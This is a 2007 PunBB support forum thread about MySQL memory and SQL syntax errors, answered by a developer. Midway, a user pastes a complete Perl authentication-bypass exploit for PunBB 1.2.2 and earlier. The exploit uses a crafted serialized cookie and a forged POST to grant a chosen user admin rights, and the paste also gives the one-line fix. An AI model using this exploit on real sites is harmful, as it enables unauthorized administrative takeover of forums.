1 Topic by h0ly lag (edited by h0ly lag 2007-04-20 01:01)

  • From: Nevada
  • Registered: 2007-04-20
  • Posts: 9

Topic: Unable to fetch category/forum list

I enabled debug mode and got this:

File: /home/uhmodsco/public_html/forums/admin_forums.php
Line: 460

PunBB reported: Unable to fetch category/forum list

Database reported: Got error 12 from table handler (Errno: 1030)

These are lines 455 through 470 in my admin_forums.php file.

<?php

$tabindex_count = 4;

// Display all the categories and forums
$result = $db->query('SELECT c.id AS cid, c.cat_name, f.id AS fid, f.forum_name, f.disp_position FROM '.$db->prefix.'categories AS c INNER JOIN '.$db->prefix.'forums AS f ON c.id=f.cat_id ORDER BY c.disp_position, c.id, f.disp_position') or error('Unable to fetch category/forum list', __FILE__, __LINE__, $db->error());

$cur_category = 0;
while ($cur_forum = $db->fetch_assoc($result))
{
    if ($cur_forum['cid'] != $cur_category)    // A new category since last iteration?
    {
        if ($cur_category != 0)
            echo "\t\t\t\t\t\t\t".'</table>'."\n\t\t\t\t\t\t".'</div>'."\n\t\t\t\t\t".'</fieldset>'."\n\t\t\t\t".'</div>'."\n";

?>

Any help guys?

h0ly lag's Website

  • Smartys
  • Former PunBB Developer
  • Offline
  • Registered: 2004-04-30
  • Posts: 7,844

Re: Unable to fetch category/forum list

Error code 12: Cannot allocate memory

Talk to your host

3 Reply by h0ly lag (edited by h0ly lag 2007-04-20 01:28)

  • From: Nevada
  • Registered: 2007-04-20
  • Posts: 9

Re: Unable to fetch category/forum list

Ok, thank you. Without doing anything at all the problem has disappeared. Could this have been a temp. problem with my MySQL database?

Oh, and I just wanted to say I love PunBB.

h0ly lag's Website

  • Smartys
  • Former PunBB Developer
  • Offline
  • Registered: 2004-04-30
  • Posts: 7,844

Re: Unable to fetch category/forum list

Yup, it was most likely a temporary MySQL issue smile

5 Reply by h0ly lag (edited by h0ly lag 2007-04-20 01:39)

  • From: Nevada
  • Registered: 2007-04-20
  • Posts: 9

Re: Unable to fetch category/forum list

Ok now some guy blows in and registers and posts this.

#!/usr/bin/perl
use IO::Socket;

#
#   PunBB version <= 1.2.2 auth bypass exploit
#
# -------------------------------------------------
# About vuln:
# lets look file /include/functions.php
# ### code start ###
# function check_cookie(&$pun_user)
# {
# ...
# if (isset($_COOKIE[$cookie_name]))
# list($cookie['user_id'], $cookie['password_hash']) = @unserialize($_COOKIE[$cookie_name]);
#
# if ($cookie['user_id'] > 1)
# {
# // Check if there's a user with the user ID and password hash from the cookie
# $result = $db->query('SELECT .... tra-la-la... );
# $pun_user = $db->fetch_assoc($result);
#
# // If user authorisation failed
# if (!isset($pun_user['id']) || md5($cookie_seed.$pun_user['password']) != $cookie['password_hash'])
# ...                                                                    ^^^ HERE !!!
# ### code end ###
# and we can logging with any user id if we use boolean value in cookie password_hash
# evil cookie is : a:2:{i:0;s:1:"2";i:1;b:1;} where 2 is user id
#
# fix:
# if (!isset($pun_user['id']) || md5($cookie_seed.$pun_user['password']) != $cookie['password_hash'])
# change to
# if (!isset($pun_user['id']) || md5($cookie_seed.$pun_user['password']) !== $cookie['password_hash'])
# -------------------------------------------------
# (c)oded by 1dt.w0lf // 09.03.2005 // r57 // www.rst.void.ru
# -------------------------------------------------
# example:
# r57punbb.pl nerf.ru /forum/ 2 47
# + Exploit success!
# + Group membership saved!
# + Now user with id=47 have admin level!
# ja-ja-ja dast ist fantastish smile
# ------------------------------------------------

$server    = $ARGV[0];
$folder    = $ARGV[1];
$admin_uid = $ARGV[2];
$user_uid  = $ARGV[3];
$suc = 0;
if (@ARGV < 4 || $admin_uid =~ /[^\d]/ || $user_uid =~ /[^\d]/)
{
print q{
       PunBB version <= 1.2.2 auth bypass exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
usage: r57punbb.pl [host] [/folder/] [admin_id] [user_id]

[host]     - hostname where punbb installed
[/folder/] - folder where punbb installed
[admin_id] - id of user who have admin rights
[user_id]  - user with this id get admin level after
              success exploiting
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
r57 private code // rst.void.ru
};
exit();
}
$server =~ s/^((?:http:\/\/)*)([^\/]*)(\/*)$/$2/;
$str    = 'Group membership saved';
$cook   = 'a:2:{i:0;s:'.length($admin_uid).':"'.$admin_uid.'";i:1;b:1;}';
$data   = 'form_sent=1&group_id=1&update_group_membership=Save';
$cook   =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "$socket error $!";
print $socket "POST ${folder}profile.php?section=admin&id=$user_uid&action=foo HTTP/1.0\n";
print $socket "Host: $server\n";
print $socket "Referer: http://$server${folder}profile.php?section=admin&id=$user_uid\n";
print $socket "Cookie: punbb_cookie=$cook\n";
print $socket "Content-Type: application/x-www-form-urlencoded\n";
print $socket "Content-Length: ".length($data)."\n\n";
print $socket "$data\n\n";
while(<$socket>){ if(/$str/) { $suc = 1; last; } }
($suc)?(print "+ Exploit success!\n+ $str!\n+ Now user with id=$user_uid have admin level!\n")
      :(print "- Exploit failed\n")

you gotta secre this site.

WTF!!! He can get admin status

h0ly lag's Website

  • Smartys
  • Former PunBB Developer
  • Offline
  • Registered: 2004-04-30
  • Posts: 7,844

Re: Unable to fetch category/forum list

You're running 1.2.2? That's over 2 years old...

  • From: Nevada
  • Registered: 2007-04-20
  • Posts: 9

Re: Unable to fetch category/forum list

Oh... I'm an idiot. I'm on 1.2.15.

h0ly lag's Website

  • Smartys
  • Former PunBB Developer
  • Offline
  • Registered: 2004-04-30
  • Posts: 7,844

Re: Unable to fetch category/forum list

h0ly lag wrote:

Oh... I'm an idiot. I'm on 1.2.15.

...which has no "live" exploits at this point in time.
Just in case anyone is confused wink

  • From: Nevada
  • Registered: 2007-04-20
  • Posts: 9

Re: Unable to fetch category/forum list

Grrr, another problem.

Guests and Regualr users get this error:

File: /home/uhmodsco/public_html/forums/viewtopic.php
Line: 124

PunBB reported: Unable to fetch topic info

Database reported: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '0forums AS pf ON f.parent_forum_id=pf.id WHERE (fp.read_forum I (Errno: 1064)

Is this something I should take up with my host?

h0ly lag's Website

  • Smartys
  • Former PunBB Developer
  • Offline
  • Registered: 2004-04-30
  • Posts: 7,844

Re: Unable to fetch category/forum list

Sounds like you modified the file incorrectly wink

  • From: Nevada
  • Registered: 2007-04-20
  • Posts: 9

Re: Unable to fetch category/forum list

Yep, I uploaded a fresh copy from the 1.2.15 zip file and everything works now. I feel like a idiot, I seem to have messed up quite a few things today. Thank you for your help. One LAST question, whats with you version numbers, are you counting down or something. Because you said 1.2.2 was 2 years old and the newest version is 1.2.15.

h0ly lag's Website

  • Smartys
  • Former PunBB Developer
  • Offline
  • Registered: 2004-04-30
  • Posts: 7,844

Re: Unable to fetch category/forum list

h0ly lag wrote:

Yep, I uploaded a fresh copy from the 1.2.15 zip file and everything works now. I feel like a idiot, I seem to have messed up quite a few things today. Thank you for your help. One LAST question, whats with you version numbers, are you counting down or something. Because you said 1.2.2 was 2 years old and the newest version is 1.2.15.

This isn't like decimals with numbers, each individual part is its own number
So there have been 16 revisions of the 1.2 branch of PunBB: 1.2.0, 1.2.1, 1.2.2, 1.2.3, 1.2.4, 1.2.5, 1.2.6, 1.2.7, 1.2.8, 1.2.9, 1.2.10, 1.2.11, 1.2.12, 1.2.13, 1.2.14, 1.2.15

  • From: Nevada
  • Registered: 2007-04-20
  • Posts: 9

Re: Unable to fetch category/forum list

Sigh...

File: /home/uhmodsco/public_html/forums/include/search_idx.php
Line: 183

PunBB reported: Unable to insert search index word matches

Database reported: Out of memory (Needed 81892 bytes) (Errno: 5)


Something must be going terribly wrong with my hosts MySQL.

h0ly lag's Website

  • Smartys
  • Former PunBB Developer
  • Offline
  • Registered: 2004-04-30
  • Posts: 7,844

Re: Unable to fetch category/forum list

Same kind of error as the first one: talk to your host wink